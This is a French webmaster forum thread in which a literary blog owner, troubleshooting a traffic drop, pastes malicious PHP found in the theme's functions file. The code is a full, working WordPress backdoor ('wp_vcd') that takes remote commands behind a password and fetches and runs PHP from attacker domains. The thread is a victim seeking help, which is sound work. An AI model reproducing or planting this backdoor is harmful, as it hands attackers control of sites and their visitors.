Avis blog litteraire

WRInaute discret
Bonjour, je possède un blog littéraire et depuis mi décembre, j'ai perdu 70% de mon trafique ( MAJ Google ?)

Auriez vous des conseils / avis sur celui-ci ? je n'ai pas d'erreur dans ma search console et mon site n'est pas top long à chercher. Je ne sais pas quelle piste exploiter
lespassionsdechinouk.com
 
WRInaute accro
Alors change de navigateur @passion

Moi j'ai plus d'infos :

Erreur d'encodage de contenu

La page demandée ne peut être affichée car elle utilise un type de compression non valide ou non pris en charge.

Merci de contacter les propriétaires du site Web pour les informer de ce problème.
 
WRInaute discret
oula !!! merdoum pourtant tout fonctionne chez moi !! c'est quoi ce bazard !! cela peut provenir de quoi ce pb d 'encodage ?
 
WRInaute accro
Vas-y change de theme..

Au passage, le fichier "source" affiche le meme encodage que la page en elle meme
 
WRInaute discret
Je ne pense pas que cela soit la cause, mais ton robots.txt indique en sitemap :
Disallow: /menu
Disallow: /connexion
Disallow: /utile
Disallow: /envoieContact.php
Disallow: /partenaire.php
Disallow: /mentions-legales.php
Disallow: /ads.txt
Sitemap: https://www.nature-randonnee.fr/sitemap.xml

merde je me suis planté de dossier en faisant un envoie ftp ! mais ça ne doit pas être la cause ( ficher envoyé en mai 2019 ! ) ça t 'embete de recharger pour voir si sans plugin ça fonctionne ? j'ai un doute sur le mailpoet qui m'avais fait un truc chelou lors d'une mise à jour
 
WRInaute discret
En tout cas merci beaucoup de ton aide ! j’espère que je vais retrouver mon trafic du coup ... j'ai bien fait de poser la question car je n'aurai jamais pu voir cette erreur qui n’apparaît pas chez moi !?
 
WRInaute accro
Tu sais, il faut entre 10 mois et un an pour qu'un nouvel article commence à ranker avec ce nouveau Google. Moi je prend même plus la peine de finaliser mes articles et de mettre les illustrations, je sais que j'ai du temps devant moi et plus vite je met en ligne plus vite il rankera
 
WRInaute discret
j'ai remarqué cela avec mon blog " voyage" en revanche avec celui la mes chroniques était assez vite présente sur la première page mais là c'est la dégringolade générale.
 
WRInaute discret
Bon je pensais être tranquille mais a priori cela recommence :(

hier en regardant mon fichier fonction j'ai trouver ce code, en tout debut de fichier et avec son propre ouverture et fermeture de balise php ( deja j ai trouver ca louche, et le code en lui meme encore plus : d autant plus qu il est indenter a la walaguene !!

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ad8eaa43b76a80ed3c84ddf0efb29081'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}








$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
// $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
$path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='8a8ddc1122d1170c4a6a2d3e60814900';
if (($tmpcontent = @file_get_contents("http://www.larors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.larors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.larors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.larors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>

j'ai donc tenté de le supprimer mais cela m'a fait replanter mon site, je l'ai remis ce matin mais je crois que ce n'est pas mieux :(
 
WRInaute discret
je viens d installer wordfence et effectivement il m'a détecté des choses pas net ! merci de l'info. je les ai virer dans l'urgence mais je vais faire une reinstal de WP complète pour etre plus sûr.
 
Discussions similaires
Haut